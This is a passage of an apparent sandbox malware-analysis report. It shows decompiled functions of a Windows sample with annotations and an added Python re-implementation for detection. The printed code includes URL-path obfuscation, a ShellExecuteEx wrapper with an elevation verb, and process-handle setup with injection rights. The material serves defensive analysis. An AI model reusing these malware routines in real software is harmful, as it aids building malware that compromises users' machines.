                                                    			// iteration runs unconditionally, so an input of exactly 8 bytes divides by zero
                                                    			// and a shorter one wraps the modulus and over-reads the source buffer.
                                                    			E0109229C(unsigned int __eax, void* __ecx) {
                                                    				void* _v8;
                                                    				void* _v12;
                                                    				signed int _t21;
                                                    				signed short _t23;
                                                    				char* _t27;
                                                    				void* _t29;
                                                    				void* _t30;
                                                    				unsigned int _t33;
                                                    				void* _t37;
                                                    				unsigned int _t38;
                                                    				void* _t41;
                                                    				void* _t42;
                                                    				int _t45;
                                                    				void* _t46;
                                                    
                                                    				_t42 = __eax;
                                                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx); // lstrlen (KERNEL32), see APIs below
                                                    				_t38 = __eax; // remaining input length
                                                    				_t30 = RtlAllocateHeap( *0x109a2d8, 0, (__eax >> 3) + __eax + 1); // len + len/8 separators + NUL
                                                    				_v12 = _t30;
                                                    				if(_t30 != 0) {
                                                    					_v8 = _t42; // source cursor
                                                    					do {
                                                    						_t33 = 0x18; // window = min(remaining, 24)
                                                    						if(_t38 <= _t33) {
                                                    							_t33 = _t38;
                                                    						}
                                                    						_t21 =  *0x109a2f0; // 0x8b6644f2 (LCG state at snapshot time)
                                                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                    						 *0x109a2f0 = _t23;
                                                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8; // chunk = (rand16 % (window - 8)) + 8
                                                    						memcpy(_t30, _v8, _t45);
                                                    						_v8 = _v8 + _t45;
                                                    						_t27 = _t30 + _t45;
                                                    						_t38 = _t38 - _t45;
                                                    						_t46 = _t46 + 0xc; // stack cleanup after cdecl memcpy
                                                    						 *_t27 = 0x2f; // '/'
                                                    						_t13 = _t27 + 1; // 0x1
                                                    						_t30 = _t13;
                                                    					} while (_t38 > 8);
                                                    					memcpy(_t30, _v8, _t38 + 1); // tail (at most 8 bytes) plus the NUL terminator
                                                    				}
                                                    				return _v12;
                                                    			}
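The chunking loop above is small enough to re-implement exactly, which is useful when you want to recognise the resulting `/`-separated paths in proxy logs or reverse the process on captured traffic. The following is an added example, not code from the sample or from Joe Sandbox: it mirrors the decompiled E0109229C (LCG constants, 8..23-byte window, trailing copy) in Python, refuses the short inputs that the original would mishandle, and adds an inverse. The seed value and the 40-byte sample string are constructed for a deterministic run; the dump only shows the LCG state 0x8b6644f2 at snapshot time.

```python
"""
Re-implementation (added example) of the string-chunking loop decompiled as
E0109229C above.  The routine walks an ASCII string and inserts a '/' after
every 8..23-byte run; the run length is drawn from a 32-bit LCG
(multiplier 0x19660D, increment 0x3C6EF35F) whose state lives at the
global 0x109a2f0 in the sample.
"""

LCG_MULT = 0x19660D      # from `_t21 * 0x19660d`
LCG_INC = 0x3C6EF35F     # from `0x3c6ef35f + ...`
MAX_WINDOW = 0x18        # `_t33 = 0x18`
MIN_CHUNK = 8            # `... + 8`
SEPARATOR = 0x2F         # `*_t27 = 0x2f`, i.e. '/'


def lcg_step(state: int) -> int:
    """One LCG update: (state * 0x19660D + 0x3C6EF35F) mod 2**32."""
    return (state * LCG_MULT + LCG_INC) & 0xFFFFFFFF


def insert_separators(data: bytes, seed: int) -> tuple[bytes, int]:
    """
    Return (chunked_bytes, new_lcg_state).

    Mirrors the do/while loop: window = min(remaining, 0x18),
    chunk = (lcg & 0xFFFF) % (window - 8) + 8, copy chunk bytes, append '/',
    repeat while more than 8 bytes remain, then copy the tail verbatim.
    """
    if len(data) <= MIN_CHUNK:
        # The original never checks this: with exactly 8 bytes the modulus is
        # zero (divide-by-zero); with fewer, (window - 8) wraps to a huge unsigned
        # value and memcpy over-reads the source buffer.  Refuse instead.
        raise ValueError("input must be longer than 8 bytes")
    state = seed
    out = bytearray()
    pos = 0
    remaining = len(data)
    while True:
        window = min(remaining, MAX_WINDOW)
        state = lcg_step(state)
        chunk = (state & 0xFFFF) % (window - MIN_CHUNK) + MIN_CHUNK
        out += data[pos:pos + chunk]
        out.append(SEPARATOR)
        pos += chunk
        remaining -= chunk
        if remaining <= MIN_CHUNK:
            break
    out += data[pos:]  # tail of at most 8 bytes, copied unchanged
    return bytes(out), state


def strip_separators(chunked: bytes) -> bytes:
    """Inverse operation, assuming the original input contained no '/' of its own."""
    return chunked.replace(b"/", b"")


def segment_lengths(chunked: bytes) -> list[int]:
    """Lengths of the '/'-delimited runs: every run but the last is 8..23 bytes, the last is <= 8."""
    return [len(seg) for seg in chunked.split(b"/")]


def allocation_bound(length: int) -> int:
    """Heap size the original requests: len + len/8 + 1 (NUL).  One '/' per >= 8-byte run always fits."""
    return length + (length >> 3) + 1


if __name__ == "__main__":
    # Constructed 40-byte input; seed 0 is an assumption for a reproducible run.
    sample = b"0123456789abcdefghijklmnopqrstuvwxyzABCD"
    chunked, _ = insert_separators(sample, seed=0)
    print(chunked, segment_lengths(chunked))
```

Because the state is global and advanced on every call, two consecutive strings from the same process never split at the same offsets; matching on the exact separator positions is therefore pointless, while the structural invariant (runs of 8..23 bytes, final run of at most 8) survives and is what a detection should key on.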

                                                    Instruction addresses (one per decompiled line; column alignment lost in extraction): 0x010922a4 to 0x01092333

                                                    APIs
                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,010958B0,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 010922A7
                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 010922BF
                                                    • memcpy.NTDLL(00000000,01B09600,-00000008,?,?,?,010958B0,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01092303
                                                    • memcpy.NTDLL(00000001,01B09600,00000001,0109384E,00000000,01B09600), ref: 01092324
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                    • String ID:
                                                    • API String ID: 1819133394-0
                                                    • Opcode ID: dbf9ccf7f0594eac14041a7befef34f2b6ed826ba88e7e0a3409c2e4a0d057f9
                                                    • Instruction ID: f383ce95580bcae5f9f15f486703c23968053d80c3f6a28f327d52f7f3f69c7e
                                                    • Opcode Fuzzy Hash: dbf9ccf7f0594eac14041a7befef34f2b6ed826ba88e7e0a3409c2e4a0d057f9
                                                    • Instruction Fuzzy Hash: 35110672A00215BFDB208B6DDC94D9E7BFEEBD4260B0502B6F54497180E7769E0097A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			// Builds a 0x3c-byte structure on the stack and hands it to a dynamically resolved
                                                    			// import at 0x109a100. 0x3c (60) is sizeof(SHELLEXECUTEINFO) on x86 and the field
                                                    			// offsets written below (+0x0c, +0x10, +0x14, +0x1c) match lpVerb, lpFile,
                                                    			// lpParameters and nShow, so this reads as a ShellExecuteEx wrapper: _a4 = file,
                                                    			// _a8 = parameters, __edi = show state, _a12 selects one of two verb strings.
                                                    			// Only the first two UTF-16 code units of each verb (L"op", L"ru") are visible in the dump.
                                                    			// Returns 0 on success, otherwise the GetLastError value.
                                                    			E01095F7C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                    				intOrPtr _v36;
                                                    				intOrPtr _v44;
                                                    				intOrPtr _v48;
                                                    				intOrPtr _v52;
                                                    				void _v60;
                                                    				char _v64;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t19;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t27;
                                                    				long _t28;
                                                    
                                                    				_t27 = __edi;
                                                    				_t26 = _a8;
                                                    				_t28 = E01094BC4(_a4, _t26, __edi); // subcall allocates BSTRs (SysAllocString), see APIs below
                                                    				if(_t28 != 0) {
                                                    					memset( &_v60, 0, 0x38);
                                                    					_t18 =  *0x109a348; // 0xa6d5a8 (base used for relocated string pointers)
                                                    					_t28 = 0;
                                                    					_v64 = 0x3c; // cbSize = sizeof(SHELLEXECUTEINFO) on x86
                                                    					if(_a12 == 0) {
                                                    						_t7 = _t18 + 0x109b4e0; // 0x70006f = L"op..."
                                                    						_t19 = _t7;
                                                    					} else {
                                                    						_t6 = _t18 + 0x109b904; // 0x750072 = L"ru..."
                                                    						_t19 = _t6;
                                                    					}
                                                    					_v52 = _t19; // +0x0c lpVerb
                                                    					_push(_t28);
                                                    					_v48 = _a4; // +0x10 lpFile
                                                    					_v44 = _t26; // +0x14 lpParameters
                                                    					_v36 = _t27; // +0x1c nShow
                                                    					E01091897();
                                                    					_push( &_v64);
                                                    					if( *0x109a100() == 0) { // resolved at runtime; called with the structure address
                                                    						_t28 = GetLastError();
                                                    					}
                                                    					_push(1);
                                                    					E01091897();
                                                    				}
                                                    				return _t28;
                                                    			}

                                                    Instruction addresses (one per decompiled line; column alignment lost in extraction): 0x01095f7c to 0x01095fff

                                                    APIs
                                                      • Part of subcall function 01094BC4: SysAllocString.OLEAUT32(00000000), ref: 01094C1E
                                                      • Part of subcall function 01094BC4: SysAllocString.OLEAUT32(0070006F), ref: 01094C32
                                                      • Part of subcall function 01094BC4: SysAllocString.OLEAUT32(00000000), ref: 01094C44
                                                    • memset.NTDLL ref: 01095F9F
                                                    • GetLastError.KERNEL32 ref: 01095FEB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AllocString$ErrorLastmemset
                                                    • String ID: <$@MqtNqt
                                                    • API String ID: 3736384471-349977332
                                                    • Opcode ID: a79b9bee452bf5f0ec487bcea0a8931e701f5d770df34c2c4b1a25a3e693de4a
                                                    • Instruction ID: bede6d2418858a86a80bcc240f87d5e5cf467a3f44f6c8a4b12ec116418fa6e5
                                                    • Opcode Fuzzy Hash: a79b9bee452bf5f0ec487bcea0a8931e701f5d770df34c2c4b1a25a3e693de4a
                                                    • Instruction Fuzzy Hash: 73014071A00219ABDF11EFA9D8A4EDEBBF8BB18750F004526F984E7240D77095049B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			// Zeroes a 0x38-byte context in ESI and creates two manual-reset events in it:
                                                    			// +0x1c starts non-signaled, +0x20 starts signaled (a typical stop/ready pair).
                                                    			// Returns 1 on success; on failure of the second event the first is closed.
                                                    			E01094B73(void* __esi) {
                                                    				struct _SECURITY_ATTRIBUTES* _v4;
                                                    				void* _t8;
                                                    				void* _t10;
                                                    
                                                    				_v4 = 0;
                                                    				memset(__esi, 0, 0x38);
                                                    				_t8 = CreateEventA(0, 1, 0, 0); // manual-reset, initially non-signaled
                                                    				 *(__esi + 0x1c) = _t8;
                                                    				if(_t8 != 0) {
                                                    					_t10 = CreateEventA(0, 1, 1, 0); // manual-reset, initially signaled
                                                    					 *(__esi + 0x20) = _t10;
                                                    					if(_t10 == 0) {
                                                    						CloseHandle( *(__esi + 0x1c));
                                                    					} else {
                                                    						_v4 = 1;
                                                    					}
                                                    				}
                                                    				return _v4;
                                                    			}

                                                    Instruction addresses (one per decompiled line; column alignment lost in extraction): 0x01094b7d to 0x01094bc3

                                                    APIs
                                                    • memset.NTDLL ref: 01094B81
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 01094B96
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01094BA3
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 01094BB5
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$CloseHandlememset
                                                    • String ID:
                                                    • API String ID: 2812548120-0
                                                    • Opcode ID: 4fec1af9e7052bcd0bd4e3ec652f90515cf1d648b4c221bd11925ba8d2384e0d
                                                    • Instruction ID: 7bb5d310168f33092ac77735d61cfb89cdd9db2be0a2962dc3c7c9423da91dc0
                                                    • Opcode Fuzzy Hash: 4fec1af9e7052bcd0bd4e3ec652f90515cf1d648b4c221bd11925ba8d2384e0d
                                                    • Instruction Fuzzy Hash: 47F05EB11043087FEB206F26DCD4C2BBBECFB8119CB11896EF6C282511D676A8099B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			// Process-level init: creates a manual-reset event, checks the OS version, caches
                                                        			// the PID and a handle to the current process in globals. Return value is a Win32
                                                    			// error code: GetLastError() if the event cannot be created, 0x32 (ERROR_NOT_SUPPORTED)
                                                    			// if the OS is too old, 0 on success.
                                                    			E00401D96() {
                                                    				void* _t1;
                                                    				unsigned int _t3;
                                                    				void* _t4;
                                                    				long _t5;
                                                    				void* _t6;
                                                    				intOrPtr _t10;
                                                    				void* _t14;
                                                    
                                                    				_t10 =  *0x403170;
                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                    				 *0x40317c = _t1;
                                                    				if(_t1 == 0) {
                                                    					return GetLastError();
                                                    				}
                                                    				_t3 = GetVersion(); // low byte = major version, next byte = minor version
                                                    				if(_t3 != 5) {
                                                    					L4:
                                                    					// _t14 is a decompiler artifact: it stands for the flags left by the
                                                    					// comparison of the major version against 5, i.e. this branch rejects
                                                    					// major versions below 5 (pre-Windows 2000).
                                                    					if(_t14 <= 0) {
                                                    						_t4 = 0x32; // ERROR_NOT_SUPPORTED
                                                    						return _t4;
                                                    					} else {
                                                    						goto L5;
                                                    					}
                                                    				} else {
                                                    					if(_t3 >> 8 > 0) { // major == 5 is only accepted with a non-zero minor (5.1+)
                                                    						L5:
                                                    						 *0x40316c = _t3; // cached GetVersion result
                                                    						_t5 = GetCurrentProcessId();
                                                    						 *0x403168 = _t5; // cached PID
                                                    						 *0x403170 = _t10;
                                                    						// 0x10047a = SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE |
                                                    						//            PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD
                                                    						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                    						 *0x403164 = _t6;
                                                    						if(_t6 == 0) {
                                                    							 *0x403164 =  *0x403164 | 0xffffffff; // fall back to the pseudo-handle (-1) for the current process
                                                    						}
                                                    						return 0;
                                                    					} else {
                                                    						_t14 = _t3 - _t3;
                                                    						goto L4;
                                                    					}
                                                    				}
                                                    			}

                                                    Instruction addresses (one per decompiled line; column alignment lost in extraction): 0x00401d97 to 0x00401e09

                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401183), ref: 00401DA5
                                                    • GetVersion.KERNEL32 ref: 00401DB4
                                                    • GetCurrentProcessId.KERNEL32 ref: 00401DD0
                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DE9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                    • String ID:
                                                    • API String ID: 845504543-0
                                                    • Opcode ID: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                                                    • Instruction ID: 07fb61b28b68616bd8ab1bea8bce7da9b136578869b72dd0dbabbca40450c2b3
                                                    • Opcode Fuzzy Hash: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                                                    • Instruction Fuzzy Hash: F4F019319803019BE7215F78BE1DB5A3FA9A709712F140536E641FA2F0D7B49A41CB9C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E010971C2() {
                                                    				void* _t1;
                                                    				intOrPtr _t5;
                                                    				void* _t6;
                                                    				void* _t7;
                                                    				void* _t11;
                                                    
                                                    				_t1 =  *0x109a30c; // 0x16c
                                                    				if(_t1 == 0) {
                                                    					L8:
                                                    					return 0;
                                                    				}
                                                    				SetEvent(_t1);
                                                    				_t11 = 0x7fffffff;
                                                    				while(1) {
                                                    					SleepEx(0x64, 1);
                                                    					_t5 =  *0x109a35c; // 0x0
                                                    					if(_t5 == 0) {
                                                    						break;
                                                    					}
                                                    					_t11 = _t11 - 0x64;
                                                    					if(_t11 > 0) {
                                                    						continue;
                                                    					}
                                                    					break;
                                                    				}
                                                    				_t6 =  *0x109a30c; // 0x16c
                                                    				if(_t6 != 0) {
                                                    					CloseHandle(_t6);
                                                    				}
                                                    				_t7 =  *0x109a2d8; // 0x1710000
                                                    				if(_t7 != 0) {
                                                    					HeapDestroy(_t7);
                                                    				}
                                                    				goto L8;
                                                    			}

                                                    APIs
                                                    • SetEvent.KERNEL32(0000016C,00000001,0109190A), ref: 010971CD
                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 010971DC
                                                    • CloseHandle.KERNEL32(0000016C), ref: 010971FD
                                                    • HeapDestroy.KERNEL32(01710000), ref: 0109720D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                    • String ID:
                                                    • API String ID: 4109453060-0
                                                    • Opcode ID: bc13807a8bc1cb376294233d6dee01446b46243c595e01e271d9586e4076b5e0
                                                    • Instruction ID: f7b97014727fed0c4ffff02cb9164892f59f1ecc83753123ed28cd1a29bfb6ae
                                                    • Opcode Fuzzy Hash: bc13807a8bc1cb376294233d6dee01446b46243c595e01e271d9586e4076b5e0
                                                    • Instruction Fuzzy Hash: B2F03772B10311DBEF305B3DE868B563BD9BB046657144594BD90D32C9DB6AC4409B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E01096068(void* __ecx) {
                                                    				signed int _v8;
                                                    				_Unknown_base(*)()* _t9;
                                                    				signed int _t11;
                                                    				intOrPtr _t12;
                                                    				struct HINSTANCE__* _t14;
                                                    				intOrPtr _t17;
                                                    				intOrPtr _t20;
                                                    
                                                    				_t9 =  *0x109a340;
                                                    				_v8 = _v8 & 0x00000000;
                                                    				_t20 =  *0x109a2f4; // 0x170
                                                    				if(_t9 != 0) {
                                                    					L2:
                                                    					if(_t20 != 0) {
                                                    						_t11 =  *_t9(_t20,  &_v8);
                                                    						if(_t11 == 0) {
                                                    							_v8 = _v8 & _t11;
                                                    						}
                                                    					}
                                                    					L5:
                                                    					return _v8;
                                                    				}
                                                    				_t12 =  *0x109a348; // 0xa6d5a8
                                                    				_t3 = _t12 + 0x109b0af; // 0x4e52454b
                                                    				_t14 = GetModuleHandleA(_t3);
                                                    				_t17 =  *0x109a348; // 0xa6d5a8
                                                    				_t4 = _t17 + 0x109b9e0; // 0x6f577349
                                                    				 *0x109a314 = _t14;
                                                    				_t9 = GetProcAddress(_t14, _t4);
                                                    				 *0x109a340 = _t9;
                                                    				if(_t9 == 0) {
                                                    					goto L5;
                                                    				}
                                                    				goto L2;
                                                    			}

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(4E52454B,00000001,?,?,010910AF,?,?), ref: 0109608C
                                                    • GetProcAddress.KERNEL32(00000000,6F577349), ref: 010960A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Nqt
                                                    • API String ID: 1646373207-806837294
                                                    • Opcode ID: 54804585beb365b9d0c1c9ff4886575f07eaf87fab183f5e2f6ace15e7a63f1d
                                                    • Instruction ID: 67bc298a96317af94a23508b9fcdc71dd8e9f0511a6439fd00cfcd1b9cb75be7
                                                    • Opcode Fuzzy Hash: 54804585beb365b9d0c1c9ff4886575f07eaf87fab183f5e2f6ace15e7a63f1d
                                                    • Instruction Fuzzy Hash: 18F04471A11206EFDF24CF59DA64EAA33FCBB486457004158F5C0D3104E77EEA04DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E010955B2(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                    				intOrPtr* _v8;
                                                    				void* _t17;
                                                    				intOrPtr* _t22;
                                                    				void* _t27;
                                                    				char* _t30;
                                                    				void* _t33;
                                                    				void* _t34;
                                                    				void* _t36;
                                                    				void* _t37;
                                                    				void* _t39;
                                                    				int _t42;
                                                    
                                                    				_t17 = __eax;
                                                    				_t37 = 0;
                                                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                    				_t2 = _t17 + 1; // 0x1
                                                    				_t28 = _t2;
                                                    				_t34 = E01096A51(_t2);
                                                    				if(_t34 != 0) {
                                                    					_t30 = E01096A51(_t28);
                                                    					if(_t30 == 0) {
                                                    						E0109692B(_t34);
                                                    					} else {
                                                    						_t39 = _a4;
                                                    						_t22 = E01097A2A(_t39);
                                                    						_v8 = _t22;
                                                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                    							_a4 = _t39;
                                                    						} else {
                                                    							_t26 = _t22 + 2;
                                                    							_a4 = _t22 + 2;
                                                    							_t22 = E01097A2A(_t26);
                                                    							_v8 = _t22;
                                                    						}
                                                    						if(_t22 == 0) {
                                                    							__imp__(_t34, _a4);
                                                    							 *_t30 = 0x2f;
                                                    							 *((char*)(_t30 + 1)) = 0;
                                                    						} else {
                                                    							_t42 = _t22 - _a4;
                                                    							memcpy(_t34, _a4, _t42);
                                                    							 *((char*)(_t34 + _t42)) = 0;
                                                    							__imp__(_t30, _v8);
                                                    						}
                                                    						 *_a8 = _t34;
                                                    						_t37 = 1;
                                                    						 *_a12 = _t30;
                                                    					}
                                                    				}
                                                    				return _t37;
                                                    			}

                                                    APIs
                                                    • lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,010947D1,?,?,?,?,00000102,01095BA4,?,?,747581D0), ref: 010955BE
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                      • Part of subcall function 01097A2A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010955EC,00000000,00000001,00000001,?,?,010947D1,?,?,?,?,00000102), ref: 01097A38
                                                      • Part of subcall function 01097A2A: StrChrA.SHLWAPI(?,0000003F,?,?,010947D1,?,?,?,?,00000102,01095BA4,?,?,747581D0,00000000), ref: 01097A42
                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010947D1,?,?,?,?,00000102,01095BA4,?), ref: 0109561C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0109562C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 01095638
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                    • String ID:
                                                    • API String ID: 3767559652-0
                                                    • Opcode ID: 3626b379c720a7459d892a7153ccf8800853cefabd70fa1154471b309bac8be2
                                                    • Instruction ID: 9050146e1710c9f8a0e8a584a1f9d2a6d06e1503f1a1ab3c4f3af37acfc6446c
                                                    • Opcode Fuzzy Hash: 3626b379c720a7459d892a7153ccf8800853cefabd70fa1154471b309bac8be2
                                                    • Instruction Fuzzy Hash: AA21D572500256EFCF125F7ADC68AAE7FF8AF69240B048055F9859B201E635C901EBE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E01091E85(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                    				void* _v8;
                                                    				void* _t18;
                                                    				int _t25;
                                                    				int _t29;
                                                    				int _t34;
                                                    
                                                    				_t29 = lstrlenW(_a4);
                                                    				_t25 = lstrlenW(_a8);
                                                    				_t18 = E01096A51(_t25 + _t29 + _t25 + _t29 + 2);
                                                    				_v8 = _t18;
                                                    				if(_t18 != 0) {
                                                    					_t34 = _t29 + _t29;
                                                    					memcpy(_t18, _a4, _t34);
                                                    					_t10 = _t25 + 2; // 0x2
                                                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                    				}
                                                    				return _v8;
                                                    			}

                                                    APIs
                                                    • lstrlenW.KERNEL32(004F0053,?,74715520,00000008,01B093CC,?,01095EE8,004F0053,01B093CC,?,?,?,?,?,?,01094974), ref: 01091E95
                                                    • lstrlenW.KERNEL32(01095EE8,?,01095EE8,004F0053,01B093CC,?,?,?,?,?,?,01094974), ref: 01091E9C
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • memcpy.NTDLL(00000000,004F0053,747169A0,?,?,01095EE8,004F0053,01B093CC,?,?,?,?,?,?,01094974), ref: 01091EBC
                                                    • memcpy.NTDLL(747169A0,01095EE8,00000002,00000000,004F0053,747169A0,?,?,01095EE8,004F0053,01B093CC), ref: 01091ECF
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 2411391700-0
                                                    • Opcode ID: ec6a70f5bd9aae4872eb5a2a67525a41013324f0ae3fdafb59300a4adc038e45
                                                    • Instruction ID: ced5ecc08831e8a23390ee85810ace76bc76cd34fac4e97a16722560d64ca7e6
                                                    • Opcode Fuzzy Hash: ec6a70f5bd9aae4872eb5a2a67525a41013324f0ae3fdafb59300a4adc038e45
